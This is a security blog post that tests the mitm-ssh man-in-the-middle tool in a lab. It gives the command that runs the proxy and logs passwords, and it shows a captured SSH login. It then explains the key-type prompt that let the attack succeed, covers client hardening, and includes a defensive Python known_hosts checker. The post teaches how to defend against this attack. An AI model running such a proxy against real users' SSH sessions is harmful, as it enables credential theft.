Loving the SSH
I read about GotoSSH.com courtesy of Risk Management Insight. I found a post by the author here, talking about the site being a Ruby on Rails application. terminal23 has a few comments too.
How can this possibly be for real? I mean, why isn't it just "givemeallyourpasswords.com"? I would love to see who is using this service.
Speaking of SSH, one of my Black Hat students brought an SSH v2-capable man-in-the-middle tool to my attention called mitm-ssh by Claes M Nyberg of darklab.org. I gave it a spin on my Ubuntu box. The only problem I had to overcome was not having /usr/local/include/linux/ available, as shown by this error:
In file included from mitm-ssh.c:96:
netfilter.h:8:26: error: linux/config.h: No such file or directory
mitm-ssh.c: In function ‘mitm_ssh’:
mitm-ssh.c:512: warning: unused variable ‘a’
mitm-ssh.c: In function ‘target_connect’:
mitm-ssh.c:796: warning: pointer targets in passing argument 1 of
‘packet_get_raw’ differ in signedness
make: *** [mitm-ssh.o] Error 1
I had /usr/src/linux-headers-2.6.17-12/include/linux/ instead, so I just created a symlink.
I installed everything via --prefix=/usr/local/mitm-ssh into /usr/local/mitm-ssh and then tried out the program. I moved my .ssh/known_hosts file so I could show connecting without mitm-ssh running first.
richard@neely:~$ ssh mitm-ssh@10.1.13.4
The authenticity of host '10.1.13.4 (10.1.13.4)' can't be established.
DSA key fingerprint is 83:4f:ed:57:9a:52:3d:29:98:a0:58:f1:21:d1:40:5a.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.1.13.4' (DSA) to the list of known hosts.
Password:
Last login: Thu Aug 16 21:42:47 2007 from neely.taosecuri
[mitm-ssh@hacom ~]$ ssh-keygen -l -f /etc/ssh/ssh_host_dsa_key.pub
2048 83:4f:ed:57:9a:52:3d:29:98:a0:58:f1:21:d1:40:5a
/etc/ssh/ssh_host_dsa_key.pub
[mitm-ssh@hacom ~]$ ssh-keygen -l -f /etc/ssh/ssh_host_rsa_key.pub
2048 98:cc:ba:6e:b7:0e:76:4e:60:5b:62:8d:07:c7:9c:f6
/etc/ssh/ssh_host_rsa_key.pub
Once I log in, you can see the fingerprints for both of the server's host keys (DSA and RSA).
Now I start mitm-ssh and tell it to listen on localhost and forward to 10.1.13.4. You would have to use some other means (like ARP poisoning) to get clients to visit my attacker box instead of 10.1.13.4.
richard@neely:~/mitm-ssh$ /usr/local/mitm-ssh/sbin/mitm-ssh
..
/|\ SSH Man In The Middle [Based on OpenSSH_3.9p1]
_|_ By CMN
Usage: mitm-ssh <host>[:<port>] [option(s)]
Routes:
<host>[:<port>] - Static route to port on host
(for non NAT connections)
Options:
-v - Verbose output
-n - Do not attempt to resolve hostnames
-d - Debug, repeat to increase verbosity
-p port - Port to listen for connections on
-f configfile - Configuration file to read
Log Options:
-c logdir - Log data from client in directory
-s logdir - Log data from server in directory
-o file - Log passwords to file
richard@neely:~/mitm-ssh$ /usr/local/mitm-ssh/sbin/mitm-ssh 10.1.13.4
-n -v -p 2222 -o /tmp/mitm-ssh-pw-log -c /tmp/mitm-ssh-cli
-s /tmp/mitm-ssh-ser
Using static route to 10.1.13.4:22
SSH MITM Server listening on 0.0.0.0 port 2222.
Generating 768 bit RSA key.
RSA key generation complete.
Couldn't create pid file "/var/run/mitm-ssh.pid": Permission denied
Now I connect to localhost on the normal port 22 (the real sshd on neely, not the proxy) so that the legitimate local DSA key is entered into known_hosts.
richard@neely:~$ ssh localhost
The authenticity of host 'localhost (127.0.0.1)' can't be established.
DSA key fingerprint is 4d:33:70:24:75:ed:fa:e0:ca:96:18:af:3c:a9:ca:84.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'localhost' (DSA) to the list of known hosts.
richard@localhost's password:
Linux neely 2.6.17-12-generic #2 SMP Mon Jul 16 19:37:58 UTC 2007 i686
richard@neely:~$ ssh-keygen -l -f /etc/ssh/ssh_host_dsa_key.pub
1024 4d:33:70:24:75:ed:fa:e0:ca:96:18:af:3c:a9:ca:84
/etc/ssh/ssh_host_dsa_key.pub
Now I connect to localhost port 2222 where mitm-ssh is listening.
richard@neely:~$ ssh mitm-ssh@localhost -p 2222
WARNING: DSA key found for host localhost
in /home/richard/.ssh/known_hosts:2
DSA key fingerprint 4d:33:70:24:75:ed:fa:e0:ca:96:18:af:3c:a9:ca:84.
The authenticity of host 'localhost (127.0.0.1)' can't be established
but keys of different type are already known for this host.
RSA key fingerprint is e9:9a:2f:e7:6e:c2:2d:9a:11:f3:e1:56:a6:f1:ac:62.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'localhost' (RSA) to the list of known hosts.
Password:
Last login: Thu Aug 16 22:19:35 2007 from neely.taosecuri
I see the same DSA key for localhost (legitimate) but now an RSA key as well, which is the one mitm-ssh generated. Note what the client did here: because known_hosts already held a DSA key for localhost, and mitm-ssh offered an RSA key, OpenSSH printed the softer "keys of different type are already known for this host" prompt instead of refusing the connection, and answering yes hands the password to the proxy. The fingerprint matches the mitm-ssh RSA key:
$ ssh-keygen -l -f mitm-ssh_host_rsa_key.pub
2048 e9:9a:2f:e7:6e:c2:2d:9a:11:f3:e1:56:a6:f1:ac:62
mitm-ssh_host_rsa_key.pub
Here is how mitm-ssh sees the activity.
WARNING: /usr/local/mitm-ssh/etc/moduli does not exist, using fixed modulus
** Error: getsockopt: Protocol not available
[MITM] Routing SSH2 127.0.0.1:48216 -> 10.1.13.4:22
[2007-08-16 22:24:34] MITM (SSH2) 127.0.0.1:48216 -> 10.1.13.4:22
SSH2_MSG_USERAUTH_INFO_RESPONSE: (mitm-ssh) mitm-ssh
[MITM] Connection from UNKNOWN:48216 closed
Here's some of the info collected. First, usernames and passwords.
$ cat mitm-ssh-pw-log
[2007-08-16 22:24:34] MITM (SSH2) 127.0.0.1:48216 -> 10.1.13.4:22
SSH2_MSG_USERAUTH_INFO_RESPONSE: (mitm-ssh) mitm-ssh
Now data from the client.
$ cat mitm-ssh-cli/ssh2\ 127.0.0.1\:48216\ -\>\ 10.1.13.4\:22
Odd, it didn't record anything there. Here's (some) data from the server.
...edited...
[mitm-ssh@hacom ~]$ ls -al
total 22
drwxr-xr-x 2 mitm-ssh mitm-ssh 512 Aug 16 21:44 .
drwxr-xr-x 19 root wheel 512 Aug 16 21:42 ..
-rw------- 1 mitm-ssh mitm-ssh 160 Aug 16 22:16 .bash_history
-rw-r--r-- 1 mitm-ssh mitm-ssh 767 Aug 16 21:42 .cshrc
-rw-r--r-- 1 mitm-ssh mitm-ssh 248 Aug 16 21:42 .login
-rw-r--r-- 1 mitm-ssh mitm-ssh 158 Aug 16 21:42 .login_conf
...edited...
That file shows data from client and server.
Incidentally, SSH v1 is disabled on 10.1.13.4:
richard@neely:/tmp$ ssh -1 10.1.13.14
Protocol major versions differ: 1 vs. 2
In any case, it pays to watch when OpenSSH tells you a host's key fingerprint has changed, and equally when it tells you a key of a different type is already known for that host, since that is the prompt this attack produced. Setting StrictHostKeyChecking yes in ssh_config turns these prompts into a refusal to connect, and HostKeyAlgorithms lets you pin the key type you expect from a host. Brian Hatch wrote a good article on SSH Host Key Protection several years ago if you want more details.
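To make the client-side decision concrete, here is an added example (not code from the original post, and not part of mitm-ssh) that classifies a freshly offered host key against a known_hosts file the way the transcript above played out: the same DSA key is a match, a different DSA key is a change, and an RSA key for a host that only has a DSA key on record is the "keys of different type are already known" case that mitm-ssh exploited. It also handles hashed (|1|salt|hash) entries and assumes the [host]:port convention for non-default ports. The keys and known_hosts lines are constructed toy data, not real keys; fingerprints are MD5 in the colon form ssh-keygen -l printed above.

```python
"""Classify a host key a server just offered against a known_hosts file.

Added example; not code from the original post or from mitm-ssh.  Verdicts:
MATCH (same key already known), CHANGED (same key type known but different),
NEW_TYPE_FOR_KNOWN_HOST (only keys of another type are known, the situation
mitm-ssh exploited by presenting its own RSA key to a client that had recorded
the legitimate DSA key) and UNKNOWN (first contact).  Keys are constructed toys.
"""
import base64
import hashlib
import hmac
import struct


def _ssh_string(b: bytes) -> bytes:
    """SSH wire-format string: 4-byte big-endian length, then the bytes."""
    return struct.pack(">I", len(b)) + b


def _ssh_mpint(n: int) -> bytes:
    """SSH wire-format mpint for a positive integer (leading 0x00 if the high bit is set)."""
    return _ssh_string(n.to_bytes((n.bit_length() + 8) // 8, "big"))


def make_rsa_blob(e: int, n: int) -> str:
    """Base64 ssh-rsa public key blob from toy parameters (constructed, not a real key)."""
    return base64.b64encode(_ssh_string(b"ssh-rsa") + _ssh_mpint(e) + _ssh_mpint(n)).decode()


def make_dss_blob(p: int, q: int, g: int, y: int) -> str:
    """Base64 ssh-dss public key blob from toy parameters (constructed, not a real key)."""
    body = b"".join(_ssh_mpint(x) for x in (p, q, g, y))
    return base64.b64encode(_ssh_string(b"ssh-dss") + body).decode()


def md5_fingerprint(blob_b64: str) -> str:
    """Colon-separated MD5 of the raw key blob, the format ssh-keygen -l printed above."""
    digest = hashlib.md5(base64.b64decode(blob_b64)).hexdigest()
    return ":".join(digest[i:i + 2] for i in range(0, len(digest), 2))


def host_token(host: str, port: int) -> str:
    """Assumption: the [host]:port convention OpenSSH uses for non-default ports."""
    return host if port == 22 else f"[{host}]:{port}"


def hash_host_entry(host: str, port: int, salt: bytes) -> str:
    """Hashed known_hosts host field: |1|base64(salt)|base64(HMAC-SHA1(salt, host))."""
    mac = hmac.new(salt, host_token(host, port).encode(), hashlib.sha1).digest()
    return "|1|%s|%s" % (base64.b64encode(salt).decode(), base64.b64encode(mac).decode())


def _host_field_matches(field: str, host: str, port: int) -> bool:
    token = host_token(host, port)
    if field.startswith("|1|"):
        _, _, salt_b64, mac_b64 = field.split("|", 3)
        mac = hmac.new(base64.b64decode(salt_b64), token.encode(), hashlib.sha1).digest()
        return hmac.compare_digest(mac, base64.b64decode(mac_b64))
    return token in field.split(",")  # plain entries may list several names


def parse_known_hosts(text: str):
    """Yield (host_field, key_type, blob) triples; comments and @marker lines are skipped."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 3 or parts[0].startswith("#") or parts[0].startswith("@"):
            continue
        yield parts[0], parts[1], parts[2]


def check_host_key(known_hosts: str, host: str, port: int, key_type: str, blob_b64: str) -> str:
    same_type, other_type = [], []
    for field, ktype, blob in parse_known_hosts(known_hosts):
        if _host_field_matches(field, host, port):
            (same_type if ktype == key_type else other_type).append(blob)
    if same_type:
        return "MATCH" if blob_b64 in same_type else "CHANGED"
    return "NEW_TYPE_FOR_KNOWN_HOST" if other_type else "UNKNOWN"


# Constructed sample keys: a stand-in for the legitimate DSA key of 10.1.13.4 and
# a stand-in for the RSA key mitm-ssh generated.  The numbers are arbitrary.
LEGIT_DSA = make_dss_blob(0xC0FFEE, 0xBEEF, 0x1234, 0x5678)
OTHER_DSA = make_dss_blob(0xC0FFEE, 0xBEEF, 0x1234, 0x9999)
ATTACKER_RSA = make_rsa_blob(65537, 0xDEADBEEFCAFEBABE)

KNOWN_HOSTS = "\n".join([
    "10.1.13.4 ssh-dss " + LEGIT_DSA,
    "[localhost]:2222 ssh-dss " + LEGIT_DSA,  # constructed: same key reached via a forwarded port
])


def demo() -> dict:
    """Replay the post's scenario; 'mitm_rsa' is the case the client only warned about."""
    return {
        "legit_dsa": check_host_key(KNOWN_HOSTS, "10.1.13.4", 22, "ssh-dss", LEGIT_DSA),
        "mitm_rsa": check_host_key(KNOWN_HOSTS, "10.1.13.4", 22, "ssh-rsa", ATTACKER_RSA),
        "swapped_dsa": check_host_key(KNOWN_HOSTS, "10.1.13.4", 22, "ssh-dss", OTHER_DSA),
        "first_contact": check_host_key(KNOWN_HOSTS, "10.1.13.99", 22, "ssh-rsa", ATTACKER_RSA),
    }


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{name:14s} {verdict}")
    print("attacker RSA fingerprint:", md5_fingerprint(ATTACKER_RSA))
```

The point of the NEW_TYPE_FOR_KNOWN_HOST verdict is that a client which treats it as "unknown host, ask the user" gives an attacker with a freshly generated key of another type exactly the opening shown in the transcript; a stricter policy treats it like CHANGED and refuses.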
Comments
But yeah, I'm not sure about feeding my ssh passwords into a site, and even though it is RoR, why would you really want to add another layer of complexity into what is essentially a security function?
It's a cool demonstration of the technology's potential, no doubt.
is very much recommended, ssh will refuse to connect to hosts whose key has changed.